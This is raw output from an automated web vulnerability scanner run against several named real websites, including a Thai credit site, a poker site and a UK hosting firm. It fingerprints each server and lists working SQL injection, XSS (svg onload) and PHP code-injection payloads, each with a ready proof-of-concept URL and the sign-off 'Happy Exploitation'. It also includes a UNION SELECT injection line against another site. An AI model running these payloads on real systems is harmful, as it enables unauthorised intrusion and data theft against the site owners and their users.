http://www.thaicredit-center.com/pro...duct_id=172%27
D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host:
http://www.thaicredit-center.com
[!] WebServer: Microsoft-IIS/7.5
[!] x-powered-by
[!] PHP/5.2.17, ASP.NET
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php</b> on line <b>32</b><br />[*] POC:
http://www.thaicredit-center.com/pro...uct_id=172%273'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php</b> on line <b>32</b><br />[*] POC:
http://www.thaicredit-center.com/pro..._id=172%273%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Unclosed quotation mark before the character string '3\\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php</b> on line <b>32</b><br />[*] POC:
http://www.thaicredit-center.com/pro..._id=172%273%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php</b> on line <b>32</b><br />[*] POC:
http://www.thaicredit-center.com/pro...73%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Unclosed quotation mark before the character string '()'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php</b> on line <b>32</b><br />[*] POC:
http://www.thaicredit-center.com/pro...73%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3'><
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php</b> on line <b>32</b><br />[*] POC: http://www.thaicredit-center.com/product_detail.php?product_id=172%273'><[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Line 1: Incorrect syntax near '\'. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php</b> on line <b>32</b><br />[*] POC:
http://www.thaicredit-center.com/pro...E%25bf%2527%27[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27
[!] Code Snippet: <b>Warning</b>: mssql_query() [<a href='function.mssql-query'>function.mssql-query</a>]: message: Unclosed quotation mark before the character string ');|]*{%0d%0a<%00>%bf%27\''. (severity 15) in <b>D:\Inetpub\vhosts\creditsanook.com\httpdocs\product_detail.php</b> on line <b>32</b><br />[*] POC:
http://www.thaicredit-center.com/pro...E%25bf%2527%27[*] Happy Exploitation

[!] Congratulations you've found 8 bugs :-)
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host:
http://www.pokerfreerollsonline.com
[!] WebServer: Apache
[!] x-powered-by
[!] PHP/5.2.17
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 0">Today </a></li>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 1"> Tuesday</a></li>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 2"> Wednesday</a></li>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 3"> Thursday</a></li>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 4"> Friday</a></li>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 5"> Saturday</a></li>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <li><a href="fullreview.php?id=absolute'x"x>x&freerollid= 6"> Sunday</a></li>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="168px"><a href="freerolls.php?sort=sa&id=absolute'x"x>x">Poker Site</a></td>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="113px"><a href="freerolls.php?sort=td&id=absolute'x"x>x" class="boldred6">Reg. Time</a> </td>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="70px"><a href="freerolls.php?sort=ra&id=absolute'x"x>x" >Start Time</a></td>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="100px"><a href="freerolls.php?sort=pa&id=absolute'x"x>x" >Prize</a></td>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="80px"><a href="freerolls.php?sort=ga&id=absolute'x"x>x">Game Type</a></td>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="143px"><a href="freerolls.php?sort=ma&id=absolute'x"x>x">Max Players</a></td>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: <td width="130px"><a href="freerolls.php?sort=ba&id=absolute'x"x>x">Restrictions</a></td>[*] POC:
http://www.pokerfreerollsonline.com/...78%22%78%3e%78[*] Happy Exploitation

[!] Congratulations you've found 14 bugs :-)
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....
[!] Target is not vulnerable!
http://onlinesales.priyafoods.com/pr...hp?id=999999.9' union all select 1,2,[t],4,5 and '0'='0 root
[!] Enter the URL:
http://www.d-ranking.com/shop.php?id=1
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host:
http://www.d-ranking.com
[!] WebServer: Apache/2.0.55 (Unix) PHP/4.4.2
[!] x-powered-by
[!] PHP/4.4.2
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....[*] Payload Found . . .[*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''>zigoo0<svg/onload=confirm(/zigoo0/)>web ORDER BY `id` ASC' at line 1[*] POC:
http://www.d-ranking.com/shop.php?id...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"x>x ORDER BY `id` ASC' at line 1[*] POC:
http://www.d-ranking.com/shop.php?id=1%78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">zigoo0<svg/onload=confirm(/zigoo0/)>web ORDER BY `id` ASC' at line 1[*] POC:
http://www.d-ranking.com/shop.php?id...o0%2F%29%3Eweb[*] Happy Exploitation

[!] Congratulations you've found 3 bugs :-)
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY `id` ASC' at line 1[*] POC:
http://www.d-ranking.com/shop.php?id=13'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ ORDER BY `id` ASC' at line 1[*] POC:
http://www.d-ranking.com/shop.php?id=13%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"() ORDER BY `id` ASC' at line 1[*] POC:
http://www.d-ranking.com/shop.php?id=13%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3'><
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''>< ORDER BY `id` ASC' at line 1[*] POC: http://www.d-ranking.com/shop.php?id=13'><[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27
[!] Code Snippet: ERROR!! fileName:/var/www/virtualhost/www.d-ranking.com/shop.php/LINE:68/ERROR:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"\'\");|]*{%0d%0a<%00>%bf%27' ORDER BY `id` ASC' at line 1[*] POC:
http://www.d-ranking.com/shop.php?id...E%25bf%2527%27[*] Happy Exploitation

[!] Congratulations you've found 5 bugs :-)
[!] Enter the URL:
https://www.squirrelhosting.co.uk/ho...info.php?id=94
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host:
http://www.squirrelhosting.co.uk
[!] WebServer: Apache/2.4.23 (Unix)
[!] x-powered-by
[!] PHP/5.6.25
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5(zigoo0))}
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK 
TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5(zigoo0))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;${@print(md5("zigoo0"))}
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK 
TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog-info.php?id=94;${@print(md5("zigoo0"))}[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li> <label for="oneclick" class="toggle-sub" onClick="">View 1 Click Installs <span class="toggleright">►</span></label> <input type="checkbox" id="oneclick" class="sub-nav-check"/> <ul id="fof-sub" class="sub-nav"> <li class="sub-heading"> <label for="oneclick" class="toggle" onClick="" title="Back">◄</label> </li><li><a href="/hosting/1-click-install-hosting.php">1 Click installs overview</a></li><li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC:
https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC:
https://www.squirrelhosting.co.uk/ho...2529%257D%253B[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B
